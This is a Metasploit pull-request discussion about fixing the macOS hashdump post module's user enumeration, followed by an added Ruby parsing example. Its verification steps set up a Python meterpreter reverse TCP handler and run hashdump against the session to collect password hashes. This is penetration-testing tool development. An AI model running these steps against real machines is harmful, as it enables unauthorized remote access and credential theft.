hash_dump now working properly up to Mac OS X High Sierra (10.13.6 in… #10594
Conversation
Instead of reimplementing it, this should just call Msf::Post::OSX::System.get_users instead. That way it's using common library code, which is better tested than a one-off in a module.
I opened another pull request 5 days ago, as acammack-r7 suggested. Days have passed, no news about the pull, now it's even labeled as "bug". Can you please explain what's going on?
We're sorry for the delay in getting this merged. It's marked a
Of course, I can try it! I hope I will be able to fix both (get_nonsystem_accounts, and post/osx/gather/hashdump) before the weekend ends. I'm going to modify this pull request for the hashdump module. Thank you (timwr and busterb) for your suggestions. Will let you know as soon as I have some news.
Cool @ssh3ll! Feel free to modify lib/msf/core/post/osx/system.rb however you like in this pull request. If it works we'll merge it here. Many thanks!
I can go ahead and make the changes I was suggesting. Just need to test them.
Release Notes: This updates the hashdump module to work on newer versions of macOS, while increasing the robustness of existing user enumeration functions in the core library for macOS.
split("\n\n") was not returning the expected value because the command was actually printing "\r\n\r\n" as though this were Windows. Since apparently this is behavior that has changed over time, I added a normalization pass first with
@timwr something I noticed while testing this with get_users was that python meterpreter doesn't appear to close the PTY after launching a subprocess. Running this module with lots of users makes it easy to get this error:
It's been a "long" time since I last checked this. Apologies for the delay and thanks to everyone.
Oh, I should have pinged @zeroSteiner: there appears to be a PTY leak when running subprocesses with python meterpreter that this unveiled.
…cluded)
These changes fix a simple issue which was preventing the module from working properly.
The initial idea was to add support for newer Mac OS X releases. However, it looks like the script works fine with the applied changes, also for the newer releases.
Initially, the script was retrieving the usernames using the ls utility. However, this behaviour may have led to several unexpected results. As an example, any file/directory stored under the /Users directory would have been considered a regular user (which doesn't even make sense).
With the applied changes, the usernames are retrieved directly from the DirectoryService, providing a more reliable way to obtain usernames and consequently allowing the script to retrieve the correct hashes.
Verification
List the steps needed to make sure this thing works:

- Start msfconsole
- use exploit/multi/handler
- set payload python/meterpreter/reverse_tcp
- set lhost dummy_ip
- set lport dummy_port
- exploit -j
- Wait for a valid Python meterpreter reverse TCP shell (assuming it's spawned as session 1)
- use post/osx/gather/hashdump
- set session 1
- run
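Two points in this thread are easy to get wrong in a post module: the description explains why enumerating accounts from DirectoryService records beats listing /Users (a directory such as Shared is not a user), and busterb's comment explains why split("\n\n") silently failed when the command output used "\r\n" line endings. The Ruby below is an added example written for this page; it is not Metasploit's code and not the pull request author's. The record format (blank-line-separated "Key: Value" lines), the sample output, the ls listing and the UniqueID >= 500 threshold for non-system accounts are all constructed assumptions for illustration.

```ruby
# Added example, not Metasploit library code. Parses DirectoryService-style
# user records and contrasts that with a naive directory listing.

# Constructed sample: two records separated by a blank line, emitted with
# Windows-style "\r\n" endings to reproduce the failure discussed in the PR.
SAMPLE_DSCL_OUTPUT = [
  "RecordName: _mbsetupuser",
  "UniqueID: 248",
  "NFSHomeDirectory: /var/setup",
  "",
  "RecordName: alice",
  "UniqueID: 501",
  "NFSHomeDirectory: /Users/alice"
].join("\r\n").freeze

# Constructed sample of what `ls /Users` might print on the same host.
SAMPLE_LS_OUTPUT = "Shared\nalice\n".freeze

# Assumed threshold: on macOS, locally created accounts start at UID 500;
# lower UIDs (and "_"-prefixed names) are treated as system accounts here.
NONSYSTEM_UID_MIN = 500

# Normalization pass: collapse "\r\n" (and bare "\r") to "\n" so that a
# blank-line separator is really "\n\n" regardless of the OS release.
def normalize_newlines(output)
  output.gsub(/\r\n?/, "\n")
end

# Split normalized output into records, each a Hash of key => value.
# Only "Key: Value" lines are recognised (multi-line values are not modelled).
def parse_records(output)
  normalize_newlines(output).strip.split("\n\n").map do |block|
    block.lines.each_with_object({}) do |line, record|
      key, value = line.chomp.split(": ", 2)
      record[key] = value if key && value
    end
  end
end

# Keep only accounts that look like real, locally created users.
def nonsystem_accounts(records)
  records.select do |record|
    name = record["RecordName"].to_s
    record["UniqueID"].to_i >= NONSYSTEM_UID_MIN && !name.start_with?("_")
  end
end

# The naive approach the PR replaced: every entry under /Users becomes a
# "user", so a shared folder is reported alongside real accounts.
def users_from_ls(listing)
  listing.lines.map(&:chomp).reject { |entry| entry.empty? || entry.start_with?(".") }
end

if $PROGRAM_NAME == __FILE__
  puts "naive split on \"\\n\\n\" found #{SAMPLE_DSCL_OUTPUT.split("\n\n").length} record(s)"
  records = parse_records(SAMPLE_DSCL_OUTPUT)
  puts "after normalization: #{records.length} record(s)"
  puts "non-system accounts: #{nonsystem_accounts(records).map { |r| r['RecordName'] }.inspect}"
  puts "ls-based listing would report: #{users_from_ls(SAMPLE_LS_OUTPUT).inspect}"
end
```

Running the file shows the naive split returning a single blob, the normalized parse yielding two records of which only alice survives the system-account filter, and the ls-based listing wrongly including Shared. The normalization step is cheap and harmless on output that already uses "\n", which is why doing it unconditionally before splitting is the safer choice in library code that has to work across OS releases.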